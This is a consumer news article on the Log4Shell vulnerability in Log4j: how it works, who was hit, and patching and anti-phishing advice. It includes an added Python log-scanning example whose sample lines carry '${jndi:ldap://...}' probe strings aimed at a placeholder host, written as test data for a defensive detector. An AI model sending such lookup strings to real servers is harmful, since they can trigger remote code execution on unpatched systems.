The Log4j flaw: What it means and what you can do to protect yourself


Most cyberattacks are low-level intrusions into personal computers or ill-protected business networks. But now and again, a massive hack demonstrates that no company or person is immune.

Do you remember the Stuxnet computer worm? It was unleashed in 2010 and used to infiltrate Iranian nuclear facilities.

It caused over 1,000 computers to physically shut down and degrade while infecting over 200,000 others. The worm caused billions of dollars in damage and is widely believed to be the most significant nation-state attack on another country.

Sounds terrible, right? Over a decade later, there’s a new threat causing havoc — and we may not even see the full implications for years to come.

Here’s the backstory

Log4j is a free, open-source library that software developers use to build records of online activities. This data can be used for functions like troubleshooting and data tracking. Because it’s free and easy to use, Log4j is in possibly millions of mobile apps and pieces of desktop software, along with just about every server on the planet.

The vulnerability — called Log4Shell — was detected late last week after an attack on the servers of the video game Minecraft. It’s rather difficult to wrap your head around how the exploit works, which is partly what makes it so dangerous. Log4j is used to look up data on a network. It interprets a text-based log message as a URL and, if instructed, can fetch and execute code from it without verifying the source.

So, in short: A few lines of code in text messages between hackers can be enough to trigger the exploit. Once inside the attacked server, hackers have unrestricted access to the data stored on it.

Why is it so dangerous?

Log4Shell works differently than typical cybersecurity vulnerabilities. It requires no interaction from users and can be let loose in a system undetected. But the biggest difference is the reward for hackers.

Malware often targets personal data, but Log4Shell can be used for anything from corporate espionage to ransomware. It is also seemingly much easier to use than other attack methods. This high-reward and easy-to-use combination could have devastating effects on thousands of companies worldwide.

Microsoft has already been attacked, but companies like Apple, Amazon, Baidu, Google, IBM, Tesla, Twitter, and Steam all use Log4j in some form or another. Tech giant VMware issued a warning to its customers that many of its products are vulnerable, and Cisco confirmed it has already been impacted.

How bad can the hacks get?

Well, if the current statistics are anything to go by, we could be witnessing one of the biggest hacks in history. Cybersecurity company Kryptos Logic told TechCrunch that it has already detected more than 10,000 separate IP addresses scanning the internet for the Log4Shell vulnerability.
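For server operators, the log-message behavior described under "Here’s the backstory" and the scanning counted above can both be checked in your own web logs. The following is an added example, not part of the original article: it flags requests carrying a Log4j lookup string and counts the distinct source addresses sending them. It assumes combined-format access logs; the sample lines, addresses and function names are constructed for illustration, and the `${jndi:` prefix it matches comes from public Log4Shell advisories rather than from this article.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample lines in combined access-log style (not real traffic).
# Addresses come from documentation ranges; hosts use the reserved .invalid TLD.
SAMPLE_LOG = """\
198.51.100.7 - - [12/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://probe.invalid/a}"
198.51.100.7 - - [12/Dec/2021:10:01:09 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fprobe.invalid%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.79"
203.0.113.20 - - [12/Dec/2021:10:02:30 +0000] "GET /login HTTP/1.1" 200 900 "-" "${JNDI:dns://probe.invalid/c}"
192.0.2.55 - - [12/Dec/2021:10:03:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

# Assumption: lookup prefix as given in public Log4Shell advisories.
LOOKUP_PREFIX = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def percent_decode(text, max_rounds=3):
    """Undo up to max_rounds layers of URL percent-encoding."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def find_probes(log_text):
    """Return {source_ip: [line numbers]} for lines carrying a lookup string."""
    hits = defaultdict(list)
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        if not line.strip():
            continue
        source_ip = line.split(" ", 1)[0]  # first field of a combined-format line
        if LOOKUP_PREFIX.search(percent_decode(line)):
            hits[source_ip].append(lineno)
    return dict(hits)


def summarize(log_text):
    """Count distinct probing sources and total matching lines."""
    hits = find_probes(log_text)
    return {"distinct_sources": len(hits),
            "probe_lines": sum(len(lines) for lines in hits.values())}


if __name__ == "__main__":
    print(find_probes(SAMPLE_LOG))
    print(summarize(SAMPLE_LOG))
```

A match records a probe attempt, not a compromise; whether the server was actually exposed depends on whether it was running an unpatched Log4j at the time.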

Not only does the likelihood of ransomware increase, but the flaw can also be used for botnet attacks. By stringing millions of computers together in a giant network, hackers harness the collective power to launch more attacks.

Remember the nation-state malware Stuxnet? It appears Log4Shell could rival that.

Microsoft said the vulnerability is being used “by multiple tracked nation-state activity groups originating from China, Iran, North Korea, and Turkey.” A “nation-state activity group” is usually a hacker collective supported by its home country.

What you can do about it

From a personal perspective, you must keep all your gadgets up to date with the latest security patches. Several affected companies have already patched their server or cloud networks, but others are still lagging.

Apple rolled out a patch to iCloud over the weekend, while anti-hacking provider Cloudflare updated its systems to prevent attacks. The Apache Software Foundation, which maintains the Log4j logging framework, released an emergency security patch, too.

If you use a service or business that hasn’t fixed the vulnerability, there’s a chance that your data will be exposed. These kinds of attacks are often directed toward the company and not necessarily its users, but the risk is ever-present.

The devastating Equifax breach from 2017 comes to mind, caused by a similar attack method. The hackers managed to expose over 140 million customers’ data, putting all Equifax customers at risk of identity fraud, phishing attacks, or ransomware.

Unfortunately, other than making sure that your own devices are updated, there isn’t much else that you can do. Until all companies patch the vulnerability, there is no telling how long the threat will remain — or if it will ever go away.

🚨 What it means for you

We can’t overstate what a big problem this is. Log4Shell impacts everything from services to security devices to the apps on your phone. That said, there’s not a ton you can do. As with any malware threat, you need to take steps to safeguard your accounts and keep your devices up to date.

✅ Make yourself an update list. It’s not just your smartphone or computer that needs regular updates. Check your tablets, streaming devices, smart home tech, router and anything that connects to the internet. Whenever you can, enable automatic updates so you’re not relying on your memory.

✅ Be on the lookout for phishing attacks. Cybercriminals latch onto vulnerabilities like this to scare you into giving up your information or even money. Only change your passwords or input information on a company’s official website — and don’t get there by clicking a link in an email or text.
